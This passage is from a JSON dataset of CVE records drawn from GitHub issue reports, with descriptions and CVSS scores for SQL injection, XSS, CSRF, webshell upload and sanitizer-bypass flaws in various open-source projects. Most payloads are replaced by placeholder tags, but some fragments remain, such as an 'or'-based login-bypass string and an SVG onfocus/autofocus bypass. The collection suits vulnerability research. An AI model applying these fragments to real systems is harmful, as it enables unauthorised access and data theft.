  79213. "Issue_Url_old": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472",
  79214. "Issue_Url_new": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472",
  79215. "Repo_new": "kubernetes-sigs/aws-iam-authenticator",
  79216. "Issue_Created_At": "2022-07-11T16:15:16Z",
  79217. "description": "CVETAG : APITAG validation bypass. CVSS Rating: High URLTAG A security issue was discovered in aws iam authenticator where an allow listed IAM identity may be able to modify their username and escalate privileges. This issue has been rated high ( URLTAG and assigned CVETAG Am I vulnerable? Users are only affected if they use the APITAG template parameter to construct a username and provide different levels of access based on the username. Affected Versions aws iam authenticator NUMBERTAG How do I mitigate this vulnerability? Upgrading to NUMBERTAG mitigates this vulnerability. Prior to upgrading, this vulnerability can be mitigated by not using the APITAG template value to construct usernames. Fixed Versions aws iam authenticator NUMBERTAG Detection This issue affected the logged identity, and is not discernable from valid requests. Acknowledgements This vulnerability was reported by Gafnit Amiga from Lightspin. /area security /kind bug /committee security response /label official cve feed",
  79218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79219. "severity": "HIGH",
  79220. "baseScore": 8.8,
  79221. "impactScore": 5.9,
  79222. "exploitabilityScore": 2.8
  79223. },
  79224. {
  79225. "CVE_ID": "CVE-2022-23850",
  79226. "Issue_Url_old": "https://github.com/kevinboone/epub2txt2/issues/17",
  79227. "Issue_Url_new": "https://github.com/kevinboone/epub2txt2/issues/17",
  79228. "Repo_new": "kevinboone/epub2txt2",
  79229. "Issue_Created_At": "2022-01-22T14:00:27Z",
  79230. "description": "FILETAG POC file at the bottom of this report. With ASAN Note: You can use ASAN for more direct verification. ERRORTAG ASAN Report ERRORTAG POC FILETAG Any issue plz contact with me: APITAG OR: twitter: MENTIONTAG",
  79231. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79232. "severity": "HIGH",
  79233. "baseScore": 7.8,
  79234. "impactScore": 5.9,
  79235. "exploitabilityScore": 1.8
  79236. },
  79237. {
  79238. "CVE_ID": "CVE-2022-23872",
  79239. "Issue_Url_old": "https://github.com/emlog/emlog/issues/147",
  79240. "Issue_Url_new": "https://github.com/emlog/emlog/issues/147",
  79241. "Repo_new": "emlog/emlog",
  79242. "Issue_Created_At": "2022-01-20T17:20:47Z",
  79243. "description": "Emlog pro NUMBERTAG has xss stored in FILETAG via footer_info param.. + VULNERABLE A Stored Cross Site Scripting (XSS) injection vulnerability exists in Emlog pro version NUMBERTAG An attacker can inject arbitrary javascripts in FILETAG via footer_info param. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac Contact me: + Github: URLTAG + Facebook: URLTAG + Email: EMAILTAG + Product: Emlog pro + Version NUMBERTAG Description: The vulnerability is present in the PATHTAG and can be exploited throuth a POST request via the \u2018footer_info\u2019 param. + Impact: An attacker can send javascripts code through any vulnerable form field to change the design of the website or any information displayed to the user, saving the information persistently on the site (e.g. database). + Suggestions: You should limit tag script and HTML Event Attributes. FILETAG + File report: URLTAG + Video Poc: URLTAG + Proof of concept (POC): + Injection javascript: FILETAG + As can be seen from the following evidence, the content of the injection was correctly saved on the page (on the database) and executed. FILETAG",
  79244. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  79245. "severity": "MEDIUM",
  79246. "baseScore": 4.8,
  79247. "impactScore": 2.7,
  79248. "exploitabilityScore": 1.7
  79249. },
  79250. {
  79251. "CVE_ID": "CVE-2022-23880",
  79252. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/25",
  79253. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/25",
  79254. "Repo_new": "taogogo/taocms",
  79255. "Issue_Created_At": "2022-01-19T07:45:25Z",
  79256. "description": "A malicious file upload vulnerability exists in FILETAG of the file management function module.. This is the latest NUMBERTAG ersion of taocms. Organize and utilize steps in two steps\uff1a Step1\uff1a Audit the source code PATHTAG line NUMBERTAG and find that there may be arbitrary new files vulnerability: FILETAG Follow up $this >realpath and find that it comes from $this >path, and $this >path can be passed in through the get parameter (where SYS_ROOT is the root directory of the website): FILETAG Here you can construct the request package for the new APITAG file: FILETAG New FILETAG is successfully created: FILETAG Step2: It is also the PATHTAG file. It is found in line NUMBERTAG that there may be an arbitrary file writing vulnerability: FILETAG The written content $_POST FILETAG Successful connection to webshell FILETAG FILETAG",
  79257. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79258. "severity": "CRITICAL",
  79259. "baseScore": 9.8,
  79260. "impactScore": 5.9,
  79261. "exploitabilityScore": 3.9
  79262. },
  79263. {
  79264. "CVE_ID": "CVE-2022-23882",
  79265. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/10",
  79266. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/10",
  79267. "Repo_new": "yeyinshi/tuzicms",
  79268. "Issue_Created_At": "2022-01-19T06:33:29Z",
  79269. "description": "PATHTAG has APITAG PATHTAG NUMBERTAG Find where the file was uploaded FILETAG NUMBERTAG Use burpsuite to intercept requests, modify packets, and add payloads FILETAG FILETAG NUMBERTAG ulnerability analysis poc NUMBERTAG AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT(' FILETAG debugging process: FILETAG NUMBERTAG Repair suggestion before executing the APITAG function, filter the id",
  79270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79271. "severity": "CRITICAL",
  79272. "baseScore": 9.8,
  79273. "impactScore": 5.9,
  79274. "exploitabilityScore": 3.9
  79275. },
  79276. {
  79277. "CVE_ID": "CVE-2022-23887",
  79278. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/59",
  79279. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/59",
  79280. "Repo_new": "yzmcms/yzmcms",
  79281. "Issue_Created_At": "2022-01-21T03:30:48Z",
  79282. "description": "APITAG NUMBERTAG CSRF vulnerability exists in the official APITAG NUMBERTAG csrf\u6f0f\u6d1e). This vulnerability allows arbitrary users to be deleted, There is a user with ID NUMBERTAG FILETAG Click delete and capture the package to generate the POC of CSRF, FILETAG Package the deletion request to dorp, and put the generated POC in the HTML page and send it to the administrator. When the administrator clicks the page, the user with ID NUMBERTAG can be deleted. FILETAG FILETAG",
  79283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  79284. "severity": "MEDIUM",
  79285. "baseScore": 6.5,
  79286. "impactScore": 3.6,
  79287. "exploitabilityScore": 2.8
  79288. },
  79289. {
  79290. "CVE_ID": "CVE-2022-23888",
  79291. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/60",
  79292. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/60",
  79293. "Repo_new": "yzmcms/yzmcms",
  79294. "Issue_Created_At": "2022-01-22T02:18:45Z",
  79295. "description": "APITAG NUMBERTAG There is a CSRF vulnerability in the foreground in the official APITAG NUMBERTAG csrf\u6f0f\u6d1e). Prepare two accounts: test NUMBERTAG and test NUMBERTAG background settings allow users to contribute, Generate POC of CSRF with test NUMBERTAG First log in to test NUMBERTAG and comment on an article, and grab the request packet, FILETAG FILETAG Log in to TEST NUMBERTAG with another browser and open the web page of the generated POC, Triggered CSRF and successfully commented as TEST NUMBERTAG FILETAG",
  79296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79297. "severity": "HIGH",
  79298. "baseScore": 8.8,
  79299. "impactScore": 5.9,
  79300. "exploitabilityScore": 2.8
  79301. },
  79302. {
  79303. "CVE_ID": "CVE-2022-23889",
  79304. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/61",
  79305. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/61",
  79306. "Repo_new": "yzmcms/yzmcms",
  79307. "Issue_Created_At": "2022-01-22T02:43:52Z",
  79308. "description": "APITAG NUMBERTAG There are concurrent operations in the front desk of the official APITAG NUMBERTAG Prepare an account test NUMBERTAG comment at the bottom of an article, and grab the request package, FILETAG Send to repeater, FILETAG Manually send several times, you can batch brush malicious comments. FILETAG",
  79309. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  79310. "severity": "MEDIUM",
  79311. "baseScore": 5.3,
  79312. "impactScore": 1.4,
  79313. "exploitabilityScore": 3.9
  79314. },
  79315. {
  79316. "CVE_ID": "CVE-2022-23898",
  79317. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/62",
  79318. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/62",
  79319. "Repo_new": "ming-soft/mcms",
  79320. "Issue_Created_At": "2022-01-20T13:28:38Z",
  79321. "description": "MCMS NUMBERTAG SQLI. A suspicious point was found in the APITAG file APITAG Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in APITAG and found a call to APITAG Next we try to inject, see the top class definition of APITAG of the file, we can know that the route is APITAG , and then Adding the method to be called, we can get the route as APITAG , and from the placeholder of APITAG , we can know that the suspicious injection point is APITAG , and then try to inject CODETAG APITAG As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run APITAG APITAG APITAG APITAG",
  79322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79323. "severity": "CRITICAL",
  79324. "baseScore": 9.8,
  79325. "impactScore": 5.9,
  79326. "exploitabilityScore": 3.9
  79327. },
  79328. {
  79329. "CVE_ID": "CVE-2022-23899",
  79330. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/63",
  79331. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/63",
  79332. "Repo_new": "ming-soft/mcms",
  79333. "Issue_Created_At": "2022-01-20T13:42:42Z",
  79334. "description": "MCMS NUMBERTAG PATHTAG SQLI. As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run APITAG Look up for filed and find the incoming parameter APITAG Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain APITAG APITAG Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain APITAG APITAG This block was found to have database calls APITAG Next we try to inject, see the file APITAG at the top of the class definition, you can know the route is APITAG , and then add the method to be called, you can get the route is APITAG , next try to inject ERRORTAG APITAG Next I wrote a py file for convenient validation, using delayed injection ERRORTAG",
  79335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79336. "severity": "CRITICAL",
  79337. "baseScore": 9.8,
  79338. "impactScore": 5.9,
  79339. "exploitabilityScore": 3.9
  79340. },
  79341. {
  79342. "CVE_ID": "CVE-2022-23901",
  79343. "Issue_Url_old": "https://github.com/skvadrik/re2c/issues/394",
  79344. "Issue_Url_new": "https://github.com/skvadrik/re2c/issues/394",
  79345. "Repo_new": "skvadrik/re2c",
  79346. "Issue_Created_At": "2022-01-20T14:10:13Z",
  79347. "description": "Stack overflow due to recursion in re2c/ APITAG /dead_rules.cc. Operating System Version\uff1aubuntu NUMBERTAG re2c version NUMBERTAG error function\uff1are2c::backprop NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffdf3f NUMBERTAG ff8 (pc NUMBERTAG f8e0 bp NUMBERTAG sp NUMBERTAG ffdf3f NUMBERTAG T NUMBERTAG f8e0 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG APITAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG APITAG stack overflow PATHTAG in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) Test example link\uff1a URLTAG url Run the following command to repeat the error\uff1a $ ./re2c example",
  79348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79349. "severity": "CRITICAL",
  79350. "baseScore": 9.8,
  79351. "impactScore": 5.9,
  79352. "exploitabilityScore": 3.9
  79353. },
  79354. {
  79355. "CVE_ID": "CVE-2022-23903",
  79356. "Issue_Url_old": "https://github.com/pearadmin/pear-admin-think/issues/1",
  79357. "Issue_Url_new": "https://github.com/pearadmin/pear-admin-think/issues/1",
  79358. "Repo_new": "pearadmin/pear-admin-think",
  79359. "Issue_Created_At": "2022-01-21T04:34:40Z",
  79360. "description": "There is a stored xss vulnerability exists in pear admin think APITAG Backend Log the xss will be execute FILETAG APITAG Code execution] true",
  79361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  79362. "severity": "MEDIUM",
  79363. "baseScore": 5.4,
  79364. "impactScore": 2.7,
  79365. "exploitabilityScore": 2.3
  79366. },
  79367. {
  79368. "CVE_ID": "CVE-2022-24032",
  79369. "Issue_Url_old": "https://github.com/jdordonezn/CVE-2022-24032/issues/1",
  79370. "Issue_Url_new": "https://github.com/jdordonezn/cve-2022-24032/issues/1",
  79371. "Repo_new": "jdordonezn/CVE-2022-24032",
  79372. "Issue_Created_At": "2022-01-29T14:32:48Z",
  79373. "description": "User enumeration in APITAG APITAG NUMBERTAG APITAG APITAG through NUMBERTAG is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid. APITAG NUMBERTAG Login attempt with invalid username FILETAG NUMBERTAG Login attempt with valid username FILETAG",
  79374. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  79375. "severity": "MEDIUM",
  79376. "baseScore": 5.3,
  79377. "impactScore": 1.4,
  79378. "exploitabilityScore": 3.9
  79379. },
  79380. {
  79381. "CVE_ID": "CVE-2022-24123",
  79382. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2946",
  79383. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2946",
  79384. "Repo_new": "marktext/marktext",
  79385. "Issue_Created_At": "2022-01-28T05:24:24Z",
  79386. "description": "XSS to RCE vulnerability in Mermaid rendered. APITAG Description APITAG According to URLTAG , it will add a closing element at the end, which means it tries to parse it as HTML. FILETAG Versions APITAG version NUMBERTAG Operating system: APITAG NUMBERTAG",
  79387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  79388. "severity": "CRITICAL",
  79389. "baseScore": 9.0,
  79390. "impactScore": 6.0,
  79391. "exploitabilityScore": 2.3
  79392. },
  79393. {
  79394. "CVE_ID": "CVE-2022-24124",
  79395. "Issue_Url_old": "https://github.com/casdoor/casdoor/issues/439",
  79396. "Issue_Url_new": "https://github.com/casdoor/casdoor/issues/439",
  79397. "Repo_new": "casdoor/casdoor",
  79398. "Issue_Created_At": "2022-01-22T09:53:09Z",
  79399. "description": "SQL injection vulnerability in field filter. The query API provides the field and value parameters to support query by field. It inserts the user's input into the raw SQL expression which can lead to a SQL injection vulnerability. APITAG And the APITAG is a public route that everyone can visit. Proof of concept: APITAG",
  79400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79401. "severity": "HIGH",
  79402. "baseScore": 7.5,
  79403. "impactScore": 3.6,
  79404. "exploitabilityScore": 3.9
  79405. },
  79406. {
  79407. "CVE_ID": "CVE-2022-24135",
  79408. "Issue_Url_old": "https://github.com/78778443/QingScan/issues/17",
  79409. "Issue_Url_new": "https://github.com/78778443/qingscan/issues/17",
  79410. "Repo_new": "78778443/qingscan",
  79411. "Issue_Created_At": "2022-01-24T07:41:45Z",
  79412. "description": "Search function Cross Site Script(XSS) Vulnerability. XSS Payload APITAG There is an xss vulnerability in all search functions. Since there are many locations, only three locations are provided to prove the existence of the vulnerability URL\uff1a \u83dc\u5355\u7ba1\u7406 URLTAG FILETAG URL\uff1a python\u4f9d\u8d56\u5e93 URLTAG FILETAG URL\uff1a hydra\u5217\u8868 URLTAG FILETAG",
  79413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79414. "severity": "MEDIUM",
  79415. "baseScore": 6.1,
  79416. "impactScore": 2.7,
  79417. "exploitabilityScore": 2.8
  79418. },
  79419. {
  79420. "CVE_ID": "CVE-2022-24177",
  79421. "Issue_Url_old": "https://github.com/zhao1231/cve_payload/issues/1",
  79422. "Issue_Url_new": "https://github.com/zhao1231/cve_payload/issues/1",
  79423. "Repo_new": "zhao1231/cve_payload",
  79424. "Issue_Created_At": "2022-02-09T03:38:05Z",
  79425. "description": "Ex libris_xss vulnerability. aaaa",
  79426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79427. "severity": "MEDIUM",
  79428. "baseScore": 6.1,
  79429. "impactScore": 2.7,
  79430. "exploitabilityScore": 2.8
  79431. },
  79432. {
  79433. "CVE_ID": "CVE-2022-24181",
  79434. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/7649",
  79435. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/7649",
  79436. "Repo_new": "pkp/pkp-lib",
  79437. "Issue_Created_At": "2022-01-25T21:29:50Z",
  79438. "description": "Add support for limiting allowed hosts. PATHTAG currently uses the APITAG , APITAG , and APITAG headers to detect the current hostname for formulating absolute URLs. Per URLTAG these headers may be user controlled and thus not trustworthy. This could be used to e.g. send password reset emails with poisoned links that direct the user to a NUMBERTAG rd party site, where the reset hash can be captured. Add support for a configuration file based whitelist of allowed hosts; the PATHTAG should pass the host through this filter before using it.",
  79439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79440. "severity": "MEDIUM",
  79441. "baseScore": 6.1,
  79442. "impactScore": 2.7,
  79443. "exploitabilityScore": 2.8
  79444. },
  79445. {
  79446. "CVE_ID": "CVE-2022-24193",
  79447. "Issue_Url_old": "https://github.com/IceWhaleTech/CasaOS/issues/84",
  79448. "Issue_Url_new": "https://github.com/icewhaletech/casaos/issues/84",
  79449. "Repo_new": "icewhaletech/casaos",
  79450. "Issue_Created_At": "2022-01-26T07:30:28Z",
  79451. "description": "A security vulnerability which will lead to controller the system. Describe the bug Here is a security vulnerability will lead to controller the system. Detail URLTAG and the password is sent to Guan. EMAILTAG .",
  79452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79453. "severity": "CRITICAL",
  79454. "baseScore": 9.8,
  79455. "impactScore": 5.9,
  79456. "exploitabilityScore": 3.9
  79457. },
  79458. {
  79459. "CVE_ID": "CVE-2022-24223",
  79460. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/255",
  79461. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/255",
  79462. "Repo_new": "thedigicraft/atom.cms",
  79463. "Issue_Created_At": "2022-01-28T11:37:41Z",
  79464. "description": "i think there's a Sql injection in FILETAG . In APITAG APITAG i post: APITAG NUMBERTAG password NUMBERTAG then, I can log in to the system with the wrong password",
  79465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79466. "severity": "CRITICAL",
  79467. "baseScore": 9.8,
  79468. "impactScore": 5.9,
  79469. "exploitabilityScore": 3.9
  79470. },
  79471. {
  79472. "CVE_ID": "CVE-2022-24229",
  79473. "Issue_Url_old": "https://github.com/ONLYOFFICE/document-server-integration/issues/252",
  79474. "Issue_Url_new": "https://github.com/onlyoffice/document-server-integration/issues/252",
  79475. "Repo_new": "onlyoffice/document-server-integration",
  79476. "Issue_Created_At": "2022-01-28T06:54:33Z",
  79477. "description": "FILETAG FILETAG Vulnerability param: type Vulnerability URL: URLTAG FILETAG FILETAG Vulnerability param: lang Vulnerability URL: URLTAG FILETAG FILETAG Vulnerability Solution Close the test example in Document Server",
  79478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79479. "severity": "MEDIUM",
  79480. "baseScore": 6.1,
  79481. "impactScore": 2.7,
  79482. "exploitabilityScore": 2.8
  79483. },
  79484. {
  79485. "CVE_ID": "CVE-2022-24249",
  79486. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2081",
  79487. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2081",
  79488. "Repo_new": "gpac/gpac",
  79489. "Issue_Created_At": "2022-01-28T10:38:34Z",
  79490. "description": "Null Pointer Dereference when dealing with APITAG version info : CODETAG poc : poc URLTAG command : APITAG hint out /dev/null $poc$ crash : ERRORTAG Here is the trace reported by debugging. We can see that the memcpy function is called on line NUMBERTAG of APITAG , which will copy the contents of the second parameter data to the buffer pointed to by the first parameter. Unfortunately, in this trace the data is NUMBERTAG NULL), causing the program to crash. CODETAG I tracked the null assignment of data in APITAG . APITAG is initialized to NULL in line NUMBERTAG When the value of APITAG is greater than NUMBERTAG line NUMBERTAG the program will allocate a memory chunk to APITAG ( line NUMBERTAG Otherwise, APITAG will remain NULL and will be assigned to APITAG in line NUMBERTAG In my crash, APITAG was set to NUMBERTAG causing APITAG to be NULL. The tag is then added to APITAG for subsequent access ( line NUMBERTAG URLTAG When the program executes to APITAG , it will get a tag from APITAG ( line NUMBERTAG and pass APITAG to the second parameter of APITAG ( line NUMBERTAG which eventually results in data being NULL. Although the program judges whether APITAG is NUMBERTAG in line NUMBERTAG it does not change the execution flow of the program and the value of APITAG . URLTAG Hope my analysis will help.",
  79491. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79492. "severity": "MEDIUM",
  79493. "baseScore": 5.5,
  79494. "impactScore": 3.6,
  79495. "exploitabilityScore": 1.8
  79496. },
  79497. {
  79498. "CVE_ID": "CVE-2022-24263",
  79499. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/17",
  79500. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/17",
  79501. "Repo_new": "kishan0725/hospital-management-system",
  79502. "Issue_Created_At": "2022-01-25T17:07:00Z",
  79503. "description": "Bypass authentication with SQL Injection. VULNERABLE: SQL Injection Authentication Bypass exists in Hospital Management System. An attacker can inject query in PATHTAG via the \u2018email\u2019 parameters. + Description: The vulnerability is present in the PATHTAG \" , and can be exploited throuth a POST request via the \u2018email\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: email =' or NUMBERTAG limit NUMBERTAG File affect: + FILETAG + Proof of concept (POC): + Inject payload: + FILETAG + Bypass authentication success and redirect admin panel + FILETAG",
  79504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79505. "severity": "CRITICAL",
  79506. "baseScore": 9.8,
  79507. "impactScore": 5.9,
  79508. "exploitabilityScore": 3.9
  79509. },
  79510. {
  79511. "CVE_ID": "CVE-2022-24264",
  79512. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/13",
  79513. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/13",
  79514. "Repo_new": "cuppacms/cuppacms",
  79515. "Issue_Created_At": "2022-01-03T11:13:24Z",
  79516. "description": "VULNERABLE: SQL injection vulnerability exists in APITAG PATHTAG via the \u2018search_word\u2019 parameters. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \u2018search_word\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the \u2018search_word\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: ERRORTAG + Proof of concept (POC): FILETAG + You can see injection code query into search_word parameters as show below + Request: FILETAG + You see version , database and data as show below + Response: FILETAG + Request and Response: FILETAG + Report: FILETAG",
  79517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79518. "severity": "HIGH",
  79519. "baseScore": 7.5,
  79520. "impactScore": 3.6,
  79521. "exploitabilityScore": 3.9
  79522. },
  79523. {
  79524. "CVE_ID": "CVE-2022-24265",
  79525. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/14",
  79526. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/14",
  79527. "Repo_new": "cuppacms/cuppacms",
  79528. "Issue_Created_At": "2022-01-04T10:07:38Z",
  79529. "description": "SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the PATHTAG parameters.. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the PATHTAG parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the PATHTAG parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload Boolean true: PATHTAG and NUMBERTAG Payload Boolean false: PATHTAG and NUMBERTAG Payload exploit example: PATHTAG and APITAG + Payload exploit: PATHTAG and APITAG + Proof of concept (POC): + Payload Boolean true: PATHTAG and NUMBERTAG Request and Response: FILETAG + Payload Boolean false: PATHTAG and NUMBERTAG Request and Response: FILETAG + Exploit: FILETAG FILETAG + Report: FILETAG",
  79530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79531. "severity": "HIGH",
  79532. "baseScore": 7.5,
  79533. "impactScore": 3.6,
  79534. "exploitabilityScore": 3.9
  79535. },
  79536. {
  79537. "CVE_ID": "CVE-2022-24266",
  79538. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/17",
  79539. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/17",
  79540. "Repo_new": "cuppacms/cuppacms",
  79541. "Issue_Created_At": "2022-01-06T15:19:45Z",
  79542. "description": "Time based SQL Injection PATHTAG via the \u2018order_by\u2019 parameters.. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \u2018order_by\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Facebook: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the \u2018order_by\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Proof of concept (POC): File report: URLTAG Video Poc: URLTAG",
  79543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79544. "severity": "HIGH",
  79545. "baseScore": 7.5,
  79546. "impactScore": 3.6,
  79547. "exploitabilityScore": 3.9
  79548. },
  79549. {
  79550. "CVE_ID": "CVE-2022-24278",
  79551. "Issue_Url_old": "https://github.com/neocotic/convert-svg/issues/86",
  79552. "Issue_Url_new": "https://github.com/neocotic/convert-svg/issues/86",
  79553. "Repo_new": "neocotic/convert-svg",
  79554. "Issue_Created_At": "2022-06-06T17:56:18Z",
  79555. "description": "Remote Code Injection vulnerable. I found the issue from version NUMBERTAG The issue is that it sanitizes svg tag only once time. so I add another svg tag which is APITAG before the original payload that I used before. CODETAG It's still vulnerable to remote code injection with directory traversal vulnerability.",
  79556. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79557. "severity": "CRITICAL",
  79558. "baseScore": 9.8,
  79559. "impactScore": 5.9,
  79560. "exploitabilityScore": 3.9
  79561. },
  79562. {
  79563. "CVE_ID": "CVE-2022-24429",
  79564. "Issue_Url_old": "https://github.com/neocotic/convert-svg/issues/84",
  79565. "Issue_Url_new": "https://github.com/neocotic/convert-svg/issues/84",
  79566. "Repo_new": "neocotic/convert-svg",
  79567. "Issue_Created_At": "2022-06-03T05:22:40Z",
  79568. "description": "Remote Code Injection vulnerable. Affected versions of this package are vulnerable to Remote Code Injection. Using a specially crafted SVG file, an attacker could read arbitrary files from the file system and then show the file content as a converted PNG file. FILETAG I've tested on NUMBERTAG ersion at the latest version. I've saw that the code patched with removing \"onload\" attribute at svg tag. But that was not enough to prevent script execution. I bypass it with \"onfocus\" attribute with \"autofocus\" attribute on svg tag. And with many other svg tags for waiting execution of scripts that assigned in onfocus attribute. Payload CODETAG I checked on the latest version. FILETAG Latest version on NPM FILETAG",
  79569. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79570. "severity": "HIGH",
  79571. "baseScore": 7.8,
  79572. "impactScore": 5.9,
  79573. "exploitabilityScore": 1.8
  79574. },
  79575. {
